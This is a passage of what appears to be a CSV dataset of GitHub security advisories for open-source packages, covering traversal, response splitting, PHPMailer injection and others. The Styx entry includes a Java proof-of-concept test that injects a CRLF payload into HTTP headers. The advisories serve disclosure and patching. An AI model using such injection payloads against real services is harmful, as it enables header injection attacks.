+For example, in a scenario where a single server has multiple instances of the application running (with separate DATA_ROOT settings), an attacker who has knowledge about the directory structure is able to read files from any other instance to which the process has read access.
+
+If instances have individual authentication (for example, HTTP authentication via a reverse proxy, source IP based filtering) or other restrictions (such as quotas), attackers may circumvent those limits in such a scenario by using the Directory Traversal to retrieve data from the other instances.
+
+#### File Write
+
+If the associated XMPP server (or anyone knowing the SECRET_KEY) is malicious, they can write files outside the DATA_ROOT. The files which are written are constrained to have the `.meta` and the `.data` suffixes; the `.meta` file will contain the JSON with the Content-Type of the original request and the `.data` file will contain the payload.
+
+### Patches
+
+PR #12 fixes the issue. The PR has been merged into version 0.4.0 and 0.4.0 has been released and pushed to PyPI. Users are advised to upgrade immediately.
+
+### Workarounds
+
+- Apache can apparently be configured to filter such malicious paths when reverse-proxying.
+- There are no other workarounds known.
+
+### References
+
+- [Pull Request #12](https://github.com/horazont/xmpp-http-upload/pull/12)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'xmpp-http-upload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/horazont/xmpp-http-upload/security/advisories/GHSA-hwv5-w8gm-fq9f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15239'}, {'type': 'WEB', 'url': 'https://github.com/horazont/xmpp-http-upload/pull/12'}, {'type': 'WEB', 'url': 'https://github.com/horazont/xmpp-http-upload/commit/82056540191e89f0cd697c81f57714c00962ed75'}, {'type': 'WEB', 'url': 'https://pypi.org/project/xmpp-http-upload/#history'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-06T18:20:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9vg3-cf92-h2h7,2023-02-13T20:45:22Z,2020-03-10T20:39:05Z,,['CVE-2013-2167'],Insufficient Verification of Data Authenticity in python-keystoneclient,python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache signing bypass,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'python-keystoneclient'}, 'ecosystem_specific': {'affected_functions': ['keystoneclient.middleware.auth_token.AuthProtocol._protect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._unprotect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._get_cache_key', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_get', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_store', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_put', 'keystoneclient.middleware.memcache_crypt.generate_aes_key', 'keystoneclient.middleware.memcache_crypt.compute_mac', 'keystoneclient.middleware.memcache_crypt.hash_data', 'keystoneclient.middleware.memcache_crypt.sign_data', 'keystoneclient.middleware.memcache_crypt.verify_signed_data', 'keystoneclient.middleware.memcache_crypt.encrypt_data', 'keystoneclient.middleware.memcache_crypt.decrypt_data']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.3'}, {'fixed': '0.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-2167'}, {'type': 'WEB', 'url': 'https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2013-2167'}, {'type': 'WEB', 'url': 'https://bugs.gentoo.org/show_bug.cgi?id=CVE-2013-2167'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2167'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/85492'}, {'type': 'WEB', 'url': 'https://github.com/openstack/python-keystoneclient/commits/0.3.0'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2013-2167'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2013-0992.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/06/19/5'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/60680'}]","{'cwe_ids': ['CWE-345'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-10T20:35:54Z', 'nvd_published_at': '2019-12-10T15:15:00Z'}"
+1.4.0,GHSA-6v7p-v754-j89v,2021-08-19T19:37:59Z,2020-03-03T15:32:03Z,,['CVE-2020-6858'],HTTP Response Splitting in Styx,"# Vulnerability
+Styx is vulnerable to CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting').
+
+# Vulnerable Component
+The vulnerable component is the `com.hotels.styx.api.HttpHeaders.Builder` due to disabling the HTTP Header validation built into Netty in these locations:
+
+https://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145
+
+https://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145
+
+`new DefaultHttpHeaders(false)` disables the built-in validation in Netty. Either use the default constructor or `new DefaultHttpHeaders(true` instead.
+
+Additionally, another vulnerable component is the StyxToNettyResponseTranslator due to also disabling the HTTP Header validation built into netty in this location.
+
+https://github.com/HotelsDotCom/styx/blob/8d60e5493e65d0d536afc0b350dcb02d24e0f7a7/components/server/src/main/java/com/hotels/styx/server/netty/connectors/StyxToNettyResponseTranslator.java#L30
+
+ `DefaultHttpResponse nettyResponse = new DefaultHttpResponse(version, httpResponseStatus, false); `
+`new DefaultHttpResponse(version, httpResponseStatus, false);` disables the built-in validation in Netty. Please use the constructor `new DefaultHttpResponse(version, httpResponseStatus, true);`
+
+# Proof of Concept
+The following test plugin proves that there is no header validation occurring.
+
+```java
+ static class VulnerablePlugin implements Plugin {
+
+ @Override
+ public Eventual<LiveHttpResponse> intercept(LiveHttpRequest request, Chain chain) {
+ String header = request.queryParam("header-value").get();
+ LiveHttpRequest newRequest = request.newBuilder()
+ .header("myRequestHeader", header)
+ .build();
+ return chain.proceed(newRequest).map(response ->
+ response.newBuilder().header("myResponseHeader", header).build()
+ ) ;
+ }
+
+ }
+
+ @Test
+ public void simpleHeaderInjectionVulnerabilityPOC() {
+ Plugin vulnerablePlugin = new VulnerablePlugin();
+ // a simple way to mock the downstream system
+ HttpInterceptor.Chain chain = request -> {
+ assertThat(request.header("myRequestHeader").orElse(null), is("test\r\nAnother: CRLF_Injection"));
+ return Eventual.of(response(OK).build());
+ };
+
+ // an example request you expect your plugin to receive
+ String encodedGet = URLEncoder.encode("test\r\nAnother: CRLF_Injection");
+ LiveHttpRequest request = get("/foo?header-value=" + encodedGet)
+ .build();
+
+ // since this is a test, we want to wait for the response
+ LiveHttpResponse response = Mono.from(vulnerablePlugin.intercept(request, chain)).block();
+
+ assertThat(response.header("myResponseHeader").orElse(null), is("test\r\nAnother: CRLF_Injection"));
+ }
+```
+Additionally, if you run this LiveHttpResponse from this test through the `StyxToNettyResponseTranslator::toNettyResponse`, ideally, it would have caused an exception to be thrown. In its current state, it does not.
+
+# Similar Vulnerabilities
+There have been reports of similar vulnerabilities in other popular libraries.
+
+GHSA-35fr-h7jr-hh86 -> CVE-2019-16771
+GHSA-mvqp-q37c-wf9j -> CVE-2019-17513
+
+
+# Finding
+This vulnerability was found due to this query that [Jonathan Leitschuh](https://twitter.com/jlleitschuh) contributed to the Semmle QL project.
+https://lgtm.com/rules/1510696449842/alerts/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.hotels.styx:styx-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0.beta8'}}]","[{'type': 'WEB', 'url': 'https://github.com/HotelsDotCom/styx/security/advisories/GHSA-6v7p-v754-j89v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6858'}, {'type': 'WEB', 'url': 'https://twitter.com/JLLeitschuh'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-03T15:31:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h96w-mmrf-2h6v,2023-09-01T10:17:08Z,2020-03-31T15:42:42Z,,['CVE-2020-10108'],Improper Input Validation in Twisted,"In Twisted Web before 20.3.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Twisted'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10108'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13'}, {'type': 'WEB', 'url': 'https://know.bishopfox.com/advisories/twisted-version-19.10.0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-24'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4308-2/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-20', 'CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-31T15:28:25Z', 'nvd_published_at': '2020-03-12T13:15:00Z'}"
+1.4.0,GHSA-cg75-6938-wx58,2021-08-23T14:31:39Z,2020-03-13T20:04:51Z,,['CVE-2009-5042'],python-docutils allows insecure usage of temporary files,python-docutils allows insecure usage of temporary files,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'docutils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5'}, {'fixed': '0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2009-5042'}, {'type': 'WEB', 'url': 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560755'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2009-5042'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T20:03:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fq77-7p7r-83rj,2021-01-08T20:24:23Z,2020-03-30T20:40:50Z,,['CVE-2020-5284'],Directory Traversal in Next.js,"### Impact
+
+- **Not affected**: Deployments on ZEIT Now v2 ([https://zeit.co](https://zeit.co/)) are not affected
+- **Not affected**: Deployments using the `serverless` target
+- **Not affected**: Deployments using `next export`
+- **Affected**: Users of Next.js below 9.3.2
+
+We recommend everyone to upgrade regardless of whether you can reproduce the issue or not.
+
+### Patches
+
+https://github.com/zeit/next.js/releases/tag/v9.3.2
+
+### References
+
+https://github.com/zeit/next.js/releases/tag/v9.3.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5284'}, {'type': 'WEB', 'url': 'https://github.com/zeit/next.js/releases/tag/v9.3.2'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1503'}]","{'cwe_ids': ['CWE-23'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T20:40:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ff5x-w9wg-h275,2020-02-28T16:38:18Z,2020-03-06T01:15:46Z,,[],Holder can generate proof of ownership for credentials it does not control in vp-toolkit,"### Impact
+The [`verifyVerifiablePresentation()`](https://github.com/rabobank-blockchain/vp-toolkit/blob/master/src/service/signers/verifiable-presentation-signer.ts#L97) method check the cryptographic integrity of the Verifiable Presentation, but it does not check if the [`credentialSubject.id`](https://github.com/rabobank-blockchain/vp-toolkit-models/blob/develop/src/model/verifiable-credential.ts#L150) DID matches the signer of the VP proof.
+
+The **verifier** is impacted by this vulnerability.
+
+### Patches
+Patch will be available in version 0.2.2.
+
+### Workarounds
+- Compute the address out of the `verifiablePresentation.proof.n.verificationMethod` using `getAddressFromPubKey()` from `crypt-util@0.1.5` and match it with the `credentialSubject.id` address from the credential.
+
+### References
+[Github issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/14)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Discuss in the existing [issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/14)
+* [Contact me](https://github.com/rabomarnix)",[],"[{'package': {'ecosystem': 'npm', 'name': 'vp-toolkit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/security/advisories/GHSA-ff5x-w9wg-h275'}, {'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/rabobank-blockchain/vp-toolkit/commit/18a7db84d3265c6ffa10ef63eb37ae1bd4ba192b'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-28T16:38:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5f37-gxvh-23v6,2023-09-06T13:51:03Z,2020-03-05T22:09:17Z,,['CVE-2016-10033'],Remote code execution in PHPMailer,"### Impact
+The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
+
+### Patches
+Fixed in 5.2.18
+
+### Workarounds
+Filter and validate user input before passing it to internal functions.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2016-10033
+Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-5f37-gxvh-23v6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10033'}, {'type': 'WEB', 'url': 'https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2016-10033.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/PHPMailer/PHPMailer'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.18'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities'}, {'type': 'WEB', 'url': 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html'}, {'type': 'WEB', 'url': 'https://www.drupal.org/psa-2016-004'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40968/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40969/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40970/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40974/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/40986/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/41962/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/41996/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/42024/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/42221/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/140291/PHPMailer-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2016/Dec/78'}, {'type': 'WEB', 'url': 'http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/539963/100/0/threaded'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/95108'}, {'type': 'WEB', 'url': 'http://www.securitytracker.com/id/1037533'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T22:05:13Z', 'nvd_published_at': '2016-12-30T19:59:00Z'}"
+1.4.0,GHSA-pq4w-qm9g-qx68,2021-07-28T18:54:53Z,2020-03-16T22:46:50Z,,['CVE-2019-19135'],Insufficient Nonce Validation in Eclipse Milo Client,"### Impact
+Credential replay affecting those connected to a server when *all 3* of the following conditions are met:
+- `SecurityPolicy` is `None`
+- using username/password or X509-based authentication
+- the server has a defect causing it to send null/empty or zeroed nonces
+
+### Patches
+The problem has been patched in version `0.3.6`. A more relaxed treatment of validation as agreed upon by the OPC UA Security Working Group is implemented in version `0.3.7`.
+
+### Workarounds
+Do not use username/password or X509-based authentication with `SecurityPolicy` of `None`.
+
+### References
+https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2019-19135.pdf
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue at [https://github.com/eclipse/milo/issues](https://github.com/eclipse/milo/issues)
+* Email [the mailing list](mailto:milo-dev@eclipse.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.milo:sdk-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/milo/security/advisories/GHSA-pq4w-qm9g-qx68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19135'}, {'type': 'WEB', 'url': 'https://github.com/eclipse/milo/commit/cac0e710bf2b8bed9c602fc597e9de1d8903abed'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2019-19135.pdf'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/security-bulletins/'}]","{'cwe_ids': ['CWE-330', 'CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-16T20:59:53Z', 'nvd_published_at': '2020-03-16T16:15:00Z'}"
+1.4.0,GHSA-m8qc-mf6p-pfq9,2021-08-19T21:52:46Z,2020-03-11T20:56:34Z,,['CVE-2014-1938'],Link Following in rply,python-rply before 0.7.4 insecurely creates temporary files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rply'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-1938'}, {'type': 'WEB', 'url': 'https://github.com/alex/rply/issues/42'}, {'type': 'WEB', 'url': 'https://github.com/alex/rply/commit/76d268a38c627bf4aebebcd064f5b6d380eb8b20'}, {'type': 'WEB', 'url': 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737627'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2014-1938'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/02/11/1'}]","{'cwe_ids': ['CWE-59'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-11T20:55:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mr6r-mvw4-736g,2020-03-25T18:19:55Z,2020-03-25T18:20:19Z,,[],Vyper interfaces returning integer types less than 256 bits can be manipulated if uint256 is used,"# VVE-2020-0001
+
+Earlier today, we received a responsible disclosure of a potential issue from @montyly (security researcher at @trailofbits) for Vyper users who make assumptions about what values certain interface types can return.
+
+### Impact
+We determined the issue to be mild and unlikely to be exploited, with an easy workaround while the correct resolution is in process. The issue stems from a number of things, which we will detail here.
+
+(1) The ABI Specification is under-defined such that function return type is not always reflected in how you use it
+
+This means that a function which returns `uint8` under the hood actually returns a 32 byte integer, making it identical to a function that returns `uint256`. This allows users to read an interface that returns a `uint8` value to be stored into a `uint256` variable without any explicit casting or input validation.
+
+(2) Vyper doesn't have `uint8` types
+
+When Vyper was originally created, it only had one numeric type, but we added just enough types to be able to work with the majority of ERC interfaces that exist.
+
+Unfortunately, we never added `uint8`, because it's only majority usage was for `ERC20.decimals()` as the return type, which isn't reflected in the method ID. Because of (1), it didn't matter that we didn't have these types implemented because you could capture the return value as `uint256` and use it just fine.
+
+(3) `ERC20.decimals()` returns `uint8`
+
+`ERC20.decimal()` (which is an optional function) returns a `uint8` type. While it was never intentioned to be used directly within a smart contract (hence being optional), someone could easily make the decision to rely on it to perform important functionality within their Vyper smart contract. This might lead to a scenario where an unexpectedly large value (> 255) returned by calling this function (which a malicious contract writer might write) would allow an attacker to manipulate or bypass certain logic depending on this value.
+
+In summary, because of (1), it isn't necessary to have to cast the return value of a function that returns `uint8` to `uint256`, and because of (2) it isn't possible to have the type system protect against this type of error. This could lead to scenarios like (3) where this behavior can be exploited.
+
+### Patches
+We are currently refactoring our typing system so we can implement all ABI-compliant integer types, but no currently patched version is available that gives users access to the `uint8` type.
+
+### Workarounds
+There is an easy workaround where you should check that the value returned by an interface which specifies `uint8` should be checked to be within the bounds of a `uint8` integer. As an example:
+
+```python
+...
+# returns uint8, but we implicitly cast to uint256 without checking
+decimals: uint256 = ERC20(_token).decimal()
+# FIX: Insert this line
+assert decimals < 256
+...
+```
+
+Depending on how you use this value, it may not be necessary to insert this check.
+
+### References
+* [ABI Specification](https://solidity.readthedocs.io/en/latest/abi-spec.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Chat with us in [our gitter ](https://gitter.im/vyperlang/community)
+* Open an issue in [https://github.com/vyperlang/vyper](https://github.com/vyperlang/vyper)
+* Email us at [security@vyperlang.org](mailto:security@vyperlang.org)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0b16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-mr6r-mvw4-736g'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-03-25T18:19:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-22jr-vc7j-g762,2023-08-30T22:57:40Z,2020-03-16T22:46:19Z,,['CVE-2020-10571'],Potential buffer overflow in psd-tools,"### Impact
+An issue was discovered in psd-tools before 1.9.4. The Cython implementation of RLE decoding did not check for malformed PSD input data during decoding to the PIL.Image or NumPy format, leading to a Buffer Overflow.
+
+### Patches
+Users of psd-tools version v1.8.37 to v1.9.3 should upgrade to v1.9.4.
+
+### Workarounds
+Without Cython present on installation, buffer overflow does not occur but IndexError will be thrown. However, already installed psd-tools with Cython extention should be upgraded.
+
+### References
+https://github.com/psd-tools/psd-tools/pull/198
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [psd-tools](https://github.com/psd-tools/psd-tools/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'psd-tools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.37'}, {'fixed': '1.9.4'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.9.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/psd-tools/psd-tools/security/advisories/GHSA-22jr-vc7j-g762'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10571'}, {'type': 'WEB', 'url': 'https://github.com/psd-tools/psd-tools/pull/198'}, {'type': 'WEB', 'url': 'https://github.com/psd-tools/psd-tools/commit/fd51f8b4a52bc9c1c06d1035dfdf2cd920e87074'}, {'type': 'WEB', 'url': 'https://github.com/psd-tools/psd-tools/releases/tag/v1.9.4'}]","{'cwe_ids': ['CWE-754'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-16T20:55:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-58mj-pw57-4vm2,2021-08-19T19:44:10Z,2020-03-05T22:09:13Z,,['CVE-2017-11503'],Cross-site scripting in PHPMailer,"PHPMailer versions prior to 5.2.24 (released July 26th 2017) have an XSS vulnerability in one of the code examples, CVE-2017-11503. The code_generator.phps example did not filter user input prior to output. This file is distributed with a `.phps` extension, so it it not normally executable unless it is explicitly renamed, and the file is not included when PHPMailer is loaded through composer, so it is safe by default. There was also an undisclosed potential XSS vulnerability in the default exception handler (unused by default). Patches for both issues kindly provided by Patrick Monnerat of the Fedora Project.
+
+### Impact
+PHPMailer 5.2.23 has XSS in the "From Email Address" and "To Email Address" fields of code_generator.php.
+
+### Patches
+Fixed in 5.2.24
+
+### Workarounds
+None.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2017-11503
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-58mj-pw57-4vm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-11503'}, {'type': 'WEB', 'url': 'https://cxsecurity.com/issue/WLB-2017060181'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2017-11503.yaml'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.24'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/143138/phpmailer-xss.txt'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/99293/'}, {'type': 'WEB', 'url': 'http://www.securitytracker.com/id/1039026'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T22:06:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6c8f-qphg-qjgp,2021-08-23T15:03:55Z,2020-03-31T15:59:54Z,,['CVE-2019-20149'],Validation Bypass in kind-of,"Versions of `kind-of` 6.x prior to 6.0.3 are vulnerable to a Validation Bypass. A maliciously crafted object can alter the result of the type check, allowing attackers to bypass the type checking validation.
+
+
+## Recommendation
+
